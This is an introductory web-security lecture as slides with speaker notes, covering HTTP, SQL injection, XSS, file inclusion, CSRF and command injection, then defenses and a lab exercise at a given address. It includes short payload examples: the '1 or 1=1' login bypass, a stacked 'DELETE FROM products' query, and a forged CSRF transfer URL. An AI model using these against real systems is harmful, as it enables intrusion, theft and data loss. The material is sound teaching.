Slide 1

Web Security

Hello everyone, belongs to BCSE lessons series, today we will study about an important session
of Information Safety, that are attacks and defenses on Wed environment, Web Security; this is
a really important part of system security.
Slide 2

Content

1 Basic knowledge

2 Popular web vulnerabilities

3 Methods of preventing and

improving

4 Exercise

Tr 2

In this lesson, we will study basic knowledge in web field

Popular web vulnerabilities, methods used by hacker to attack system, and attack user of
the system
.Part 3 is about methods of preventing and improving possible faults.
Q/A, exercise and test at the end of lesson
Slide 3

Basic knowledge

Tr 3

Let’s start with the first part: basic knowledge

Slide 4

General view of website system

Web server Web application Database

Tr 4

General view of website system

There are 3 parts of a website system executed: web server, web application, and database
Web server is a server installed with software serving to the web. It hears requests from user
and then deal with these requests, and sends back results to browser. The browser will display
these results to user.
Web application is a place where script or code from server build application executed. Some
popular languages from server are PHP, ASP.NET, JSP, Python,...
Database is a place where web application stores entire data and implement operations by
questions. Some popular database management systems are MySQL, SQL Server, Oracle.
Moreover, there are some non-relational database management systems, like MongoDB.
Understanding components of website system will give us a general view, then find weakness of
website.
Slide 5

HTTP protocol
HypeText Transfer Protocol
Protocol at application level
Connect between client and server
Used for World Wide Web

Tr 5

Next, HTTP protocol

HTTP is abbreviated by HypeText Transfer Protocol. This is protocol at application level in OSL
model, implementing duties of connecting and transferring data between web client and web
server , and this is protocol used for World Wide Web – WWW

We will analyze format of HTTP message

There are 2 types, that are HTTP Request Message (request sent by client to server), and HTTP
Response Message (response sent by server to client).
Basically, these 2 types include 4 components
Start-Line (Request-Line / Status-Line)
Header Fields, providing information about request or response
Empty Line, only containing CRLF (\r\n)
Message Body, optional
Slide 6

HTTP Message Format

Start-Line
Header Fields
Empty Line (CRLF)
Message Body

Tr 6

We will analyze format of HTTP message

There are 2 types, that are HTTP Request Message (request sent by client to server), and HTTP
Response Message (response sent by server to client).
Basically, these 2 types include 4 components
Start-Line (Request-Line / Status-Line)
Header Fields, providing information about request or response
Empty Line, only containing CRLF (\r\n)
Message Body, optional
Slide 7

HTTP Request Methods

GET/POST
HEAD
PUT
DELETE
CONNECT
OPTIONS
TRACE

Tr 7

Requests are sent by client to server by a definite method

There are 8 Request Methods: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE
Let’s pay attention on 2 most popular methods that are GET and POST. GET method is used to
take a definite information on server based on URI , POST method is used to send data to
server, for example, information about account, content of file uploaded
Slide 8

HTTP Status Code

1xx: Informational
2xx: Success
3xx: Redirection
4xx: Client Error
5xx: Server Error

Tr 8

HTTP Status Code

Status code belongs to response, whose format includes 3 digits, in which, the first digit defines
type of response, the next 2 digits indicate meaning of response
Code starting 1: inform that request is received and in process
Code starting 2: mean that request is accepted and dealt with successfully
Code starting 3: mean that some actions are needed to complete request, for example, redirect
(302)
Code starting 4: error from client, grammar of request is not accurate or cannot be
implemented.
Code starting 5: error from server, server fails to process a legal request.
Slide 9

Cookie
HTTP cookie, Web cookie, Browser
cookie
A small data segment saved in browser
of user
Size about 4Kb
Store status or actions informaiton of
user

Tr 9

Next, cookie
You may see it like a cake, but it is not.
cookie is also called HTTP cookie, web cookie, browser cookie; it is a small data segment (with
size about 4kb) sent from web server to browser and stored in this browser when user accesses
to the website. It is used to store status or actions of user (for example, whether user access to
website not, how much time user visits to this website, which products is in basket,…..)
Slide 10

Popular web vulnerability

Tr 10

The next part is about web vulnerability.

Slide 11

SQL Injection (1)

This is a technology enabling attacker to
take advantage of vulnerability of
checking input data in web applications
and error announcements of database
management system are sent back to
inject and execute illegal SQL command

Tr 11

The most familiar and dangerous vulnerability is SQL Injection . This is a technology enabling
attacker to take advantage of vulnerability of checking input data in web applications and error
announcements of database management system are sent back to inject and execute illegal SQL
command.
This fault often happens on web application having data managed by database management
system such as SQL Server, MySQL, Oracle.
Slide 12

SQL Injection (2)

Threats:
 Enable attackers to implement operation
of adding, correcting, and deleting on
database of application.
 Install webshell on the system, gaining
server control. .

Tr 12

Exploitation of SQL Injection can enable attackers to implement operation of adding, correcting,
and deleting on database of application. More dangerously, we can install webshell on the
system, gaining server control.
Slide 13

SQL Injection (3)

Example

Tr 13

Let’s consider typical example: bypass form for log in

As you can see on the screen, server implements a question to select normal from where, with
2 input data and having no filtering mechanism
By a small operation, enter user-id with ‘1 or 1=1, hacker can easily bypass through log in form
to approach inside.
Slide 14

SQL Injection (4)

Types of exploitation
 Boolean-based blind
 Time-based blind
 Error-based
 UNION query-based
 Stacked queries

Tr 14

In accordance with SQLmap developer, there are some effective and free tools of detecting and
exploiting SQL Injection, with 5 main types of exploiting SQL Injection that are Boolean based
blind, Time based blind, error based, union query, stacked queries.
Firstly. Boolean based blind: fundamentals of this technology is to compare of right/wrong to
find each character of information such as table name, column name, etc
Due to broad comparison scope, exploitation of fault is mainly implemented by tool
Time based: this technology is based on process time of server for different requests to
determine each character of table, column
Next, error based: based on error announcement of database management system. This
technology is only used when web application configurated shows error announcements of
database management system.
Fourthly, using Union queries. This is a popular method when exploiting Sql Injection. Its
fundamentals is to use union keyword to gather results of select clause, then get information
from database
The last one is stack queries, also called piggy backing. By adding character ; (; is character
indicating to break command in sql), we can implement many sql commands at a request time,
for example SELECT * FROM products WHERE productid=1; DELETE FROM products
Slide 15

SQL Injection (5)

Basic steps of exploitation
 Detect
 Collect information about database
management system
 Determine number of column in SELECT
clause
 Determine name of table and column
 Determine content stored in database
Tr 15

Basic steps of exploitation :

Detect, use special characters such as apostrophes, quotation mark, semicolon , etc, if having
error announcement → may be SQL injection happened. When detecting the application
infected by Sql Injection, you need to collect information about database management system
of this application, including types of database (mysql, mssql, oracle…) and its version.
Depended on the version or type of database management system used by this application, we
will apply different exploitation technology. A simple example of difference between types of
database management system is that: mssql uses comment character with ‘--’, while mysql uses
‘##’…
Determine number of column in SELECT clause: when exploiting Sql Injection, we usually use
one or many subselect clause(s) through union keyword. Union is a keyword used to add up
results of many select clauses, thus, each select clause requires equal number of fields and this
is equal to number of fields selected in the initial select clause
Determine name of table and column: in order to exploit Sql Injection, we need know some
information about database as well as name of table, name of column, types of data for each
column…… this stage requires rather much time
The last is to determine content stored in database
Slide 16

XSS (1)
Cross-Site Scripting
This technology enables hacker to insert
malware to website having
vulnerabilities

Tr 16

Let’s move to the second vulnerability: XSS. Cross-Site Scriptingl is a technology which enables
hacker to insert malware to website
Slide 17

XSS (2)
Threats
 End user’s information gets stolen
 Admin account is seized
 Ill images are inserted into the website,
causing bad effect to reputation

Tr 17

XSS enables hacker to execute hazardous script on browser of user, this causes user’s
information is stolen, administrator account of administration page is held, website is inserted
with bad image, which will damage reputation of website of company and organization
Slide 18

XSS (3)
Exploits
 Reflected XSS
 Stored XSS
 DOM Based XSS

Tr 18

In general, XSS is divided into three main types: Reflected XSS, Stored XSS và DOM based XSS
Slide 19

XSS (4)
Reflected XSS

Tr 19

The first is Reflected XSS. There are many ways to exploit through Reflected XSS; one of them is
to hold work session of users, then can access to data and hold their permission on website.
Look at the screen. This is scenarios of Reflected XSS.attack
Firstly, users log in a website and are affixed to a session. By means of something, hacker sends
to user with exploitation URL. Victim access to this URL, server will respond to this victim, with
data in request (javascript of hacker). Victim’s browsers executes javascirpt, victim’s session is
sent to hacker. Then, hacker can forge victim to implement all his permission on website.
Slide 20

XSS (5)
Stored XSS

Tr 20

The second is a more dangerous type: Stored XSS.

While Reflected fights directly to some victims aimed at by hacker, Stored XSS orients to more
victims. This error happens when web application does not check carefully input data before
storing it into database (I use this concept herein to refer database, file or other areas used to
store data of web application). For examples, suggestion form, comments….on websites
With Stored XSS technology, hacker does not exploit directly, he has to implement at least by 2
steps
Firstly, hacker will take advantage of input points vào (form, input, textarea…) which are not
checked carefully to insert dangerous codes to database
Next. When user accesses web application and implement operations related to this data
stored, the code of hacker will be executed on user’s browser
Slide 21

XSS (6)
Stored XSS

Tr 21

Exploitation scenarios is describes as this image

There are 2 big differences during attack process between Reflected XSS and Stored XSS
Firstly, in order to exploit Reflected XSS, hacker has to cheat victim so that this victim will access
to his URL. While, with Stored XSS, this action does not need, after inserting dangerous code to
database of the application, hacker only need to wait for victim to automatically access to it. For
victim, this is absolutely normal, because they do not know that the database to which they
access to is dangerous
Secondly, hacker can gain his targets more easily if at the moment of fighting, the victim is still
in session of web application. With Reflected XSS, hacker can persuade or cheat victim to log in
and then access to URL provided by him to execute malware. But, Stored XSS is different,
because malware is stored in Web database, thus, any when user accesses to relevant function,
the malware will be executed, and these functions are likely to request authentication (log in)
first, thus, it is certain that in this moment, the user is still in work session.
Therefore, we can see that Stored XSS is more dangerous than Reflected XSS, the affected object
can be all users of the web applications. And, if victim plays a administrator role, the control
permission of that web can possibly be held.
Slide 22

XSS (7)
DOM based XSS

Tr 22

Another type of XSS exploitation is DOM based XSS

Firstly, we need to know definition of DOM. DOM is abbreviation of Document Object Model,
which is a standard type of W3C given in order to log out and operate data with structure such
as HTML, XML. This model shows document under hierarchical tree structure. All components in
HTML, XML are considered as a node
DOM Based XSS is a technology exploiting XSS based on change of DOM structure of document,
specifically HTML
Exploitation scenarios is like this image
This image gives us 2 important conclusions. The first, malware is executed immediately when
clicking to value in select card, it means that is is executed from client without response of
server. The second, HTML structure is changed with script. Anh from actual exploitation
scenarios, DOM Based is more similar with Reflected than Stored XSS when it needs to cheat
user to access to o URL infected by malware
Slide 23

Insecure File Handling

File Inclusion
Insecure File Uploads

Tr 23

To continue, we will move to errors related to dealing with file unsafely , including File Inclusion
and Insecure File Upload
Slide 24

File Inclusion (1)

Tr 24

File Inclusion
This is a popular vulnerability in web application, which enables hacker to read sensitive files on
server, more dangerously, hacker can use Log Poisoning to upload web shell to server
Slide 25

File Inclusion (2)

Local File Inclusion
Remote File Inclusion

Tr 25

There are 2 types of File Inclusion that are Local File Inclusion and Remote File Inclusion.
LFI is a technology enabling to read a file on the website, hacker can read much sensitive
information of server, such as file etc/password, php.ini,...
The second type is RFI, this is a technology calling to a file from another server, the content of
this file can contain malware độc (web shell,...)
Slide 26

Insecure File Upload

Tr 26

Another vulnerability is Insecure File Upload

This vulnerability enable to upload dangerous file to server without control mechanism or loose
control
Slide 27

CSRF (1)
One-click attack, session ridding, XSRF
Type of attack which cheats the last
user to implement unexpected actions
on a web application

Tr 27

CSRF, also called one-click attack, session riding, XSRF, is a type of attack which cheats the last
user to implement unexpected actions on a web application
Slide 28

CSRF (2)
Threats
 User implement unexpected queries
without awareness
 Lose data
 Lose money
 Affect image and reputation of users
 …

Tr 28

When website is CSRF, there are threats as follows

User implement unexpected queries without knowing that they ca
Lose data
Lose money
Affect image and reputation of users
Now, we will consider an example of CSRF vulnerability
Slide 29

CSRF (3)
Example:
 A wants to transfer money to B
through Internet Banking service at
website ebanking.vn
 URL for implementing this request is:
http://ebanking.com/transfer.do?acct
=B&amount=100

Tr 29

- A wants to transfer money to B through Internet Banking service at website ebanking.vn

- URL for implementing this request is: http://ebanking.com/transfer.do?acct=A&amount=100
Slide 30

CSRF (4)
Examples:
 By means of something, C knows structure
of this URL, C will corrects this URL
tohttp://ebanking.com/transfer.do?acct=C&
amount=100
 C cheats A to implement this request (at the
moment A log in)
 C gains 100$ !

Tr 30

- By means of something, C knows structure of this URL, C will corrects this URL to:
http://ebanking.com/transfer.do?acct=C&amount=100
- C cheats A to implement this request (at the moment A log in)
- C gains 100$
In order to cheat A to implement this request, for examples, sending URL through email,
facebook, today almost URL are reduced, thus, it is difficult to guess it
Slide 31

CSRF (5)
Analysis of causes:
 Web application often manages users
through cookie
 Web browser automatically attaches
cookie to requests sent to
http://bank.vn, anyone sends this
request.

Tr 31

- Web application often manages users through cookie

- Web browser automatically attaches cookie to requests sent to http://bank.vn, anyone sends
this request.
Slide 32

CSRF (6)
Analysis of causes
 If http://bank.vn has no mechanism to
identify request sent from
http://attacker.vn, attacker will have
entire control right for user’s session

Tr 32

If http://bank.vn has no mechanism to identify request sent from http://attacker.vn, attacker

will have entire control right for user’s session
Slide 33

OS Command Injection

Tr 33

OS Command Injection Vulnerability

This vulnerability happens when hacker tries to execute systematic command through web
vulnerability. If applications use data entered by user as input for systematic command, they are
possible to infect this error.
Slide 34

SOLUTIONS

The next part of the lesson is solutions and prevention of threats from web vulnerabilities
Slide 35

Solutions
safe programming
 Control strictly input data of user
 client
 server
 Encode data sent back
 Re-authenticate important operations,
for examples: transfer

Tr 35

Firstly, safe programming

- Control strictly input data of user
- Encode data sent back
- Re-authenticate important operations, for examples: transfer
Slide 36

Solutions
Configuration for system
 Set strong password
 Never set default setting
 Grant minimum permission for users, for
system

Tr 36

Configuration for system

- Set strong password
- Never set default setting
- Grant minimum permission for users
Slide 37

Solutions
Update the latest version of software
and service
Close unnecessary service on system

Tr 37

Update the latest version of software and service

Close unnecessary service on system
Slide 38

Exercise

Tr 38

The last part, we will move to exercise

Slide 39

Requirements:
• Access to the address :
128.199.140.34:1337
• Implement exploitation of
vulnerabilities: SQL injection, XSS, LFI

Tr 39

Requirements:
Access to the address on slide
Implement exploitation of vulnerabilities: SQL injection, XSS, LFI
Slide 40

Thank you for your attention

Tr 40